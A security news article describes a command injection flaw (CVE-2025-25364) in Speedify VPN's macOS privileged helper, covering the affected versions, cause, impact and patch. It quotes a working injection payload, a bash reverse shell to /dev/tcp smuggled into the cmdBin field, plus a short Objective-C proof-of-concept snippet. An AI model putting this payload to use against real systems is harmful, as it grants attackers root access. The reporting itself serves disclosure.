A major security flaw in the Speedify VPN application for macOS, tracked as CVE-2025-25364, has exposed millions of users to the risk of complete system compromise.
Researchers at SecureLayer7 discovered the vulnerability in Speedify’s privileged helper tool. It could potentially allow local attackers to execute arbitrary commands as root and take total control of affected systems.
The root of the problem lies within the me.connectify.SMJobBlessHelper XPC service—a helper tool that runs with elevated (root) privileges to perform system-level network operations for Speedify.
This service, installed as a privileged daemon via /Library/PrivilegedHelperTools/me.connectify.SMJobBlessHelper, is configured to receive and process commands from the main Speedify app via Apple’s XPC messaging system.
Aspect | Details |
CVE ID | CVE-2025-25364 |
Affected Product | Speedify VPN |
Affected Version | 15.0.0 (macOS) |
Patched Version | 15.4.1 |
Component | me.connectify.SMJobBlessHelper (Privileged Helper Tool at /Library/PrivilegedHelperTools/) |
Vulnerability Type | Command Injection |
Due to improper input validation, particularly of the cmdPath and cmdBin fields in incoming XPC messages, a local attacker can craft a malicious payload.
These fields are directly embedded into the command execution logic without sanitization, enabling an attacker to inject arbitrary shell commands, which the helper tool then executes with root privileges.
Three key functions are at the heart of this vulnerability:
rax = asprintf(&var_38, “codesign -v -R=\”certificate leaf[subject.CN] = \”%s\” and anchor apple generic\” \”%s\””, “…”, rcx);
A threat actor can set cmdBin or cmdPath to a string such as “; bash -i >& /dev/tcp/127.0.0.1/1339 0>&1; echo ” to open a root shell connection to an external server.
Researchers released a proof-of-concept (PoC) exploit written in Objective-C, using the XPC APIs to connect to the vulnerable helper and send a crafted payload.
The payload triggers arbitrary code execution as root, such as spawning a reverse shell. Here’s a relevant snippet:
xpc_dictionary_set_string(message, "cmdPath", "/tmp");
const char *injectionPayload = "\"; bash -i >& /dev/tcp/127.0.0.1/1339 0>&1; echo \"";
xpc_dictionary_set_string(message, "cmdBin", injectionPayload);
The impact of this flaw is critical: an attacker with local access could gain full root control, modify sensitive files, install persistent malware, and exfiltrate data.
Since most Speedify VPN users rely on the app for privacy, this vulnerability could have undermined the security of a broad user base.
Speedify users are strongly advised to upgrade to version 15.4.1 or above, which addresses the flaw with a complete helper tool rewrite, stricter input validation, and the removal of insecure XPC handling.
The incident highlights the paramount importance of rigorous input validation in all privileged code.
Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!
A new project has exposed a critical attack vector that exploits protocol vulnerabilities to disrupt…
A threat actor known as #LongNight has reportedly put up for sale remote code execution…
Ivanti disclosed two critical vulnerabilities, identified as CVE-2025-4427 and CVE-2025-4428, affecting Ivanti Endpoint Manager Mobile…
Hackers are increasingly targeting macOS users with malicious clones of Ledger Live, the popular application…
The European Union has escalated its response to Russia’s ongoing campaign of hybrid threats, announcing…
Venice.ai has rapidly emerged as a disruptive force in the AI landscape, positioning itself as…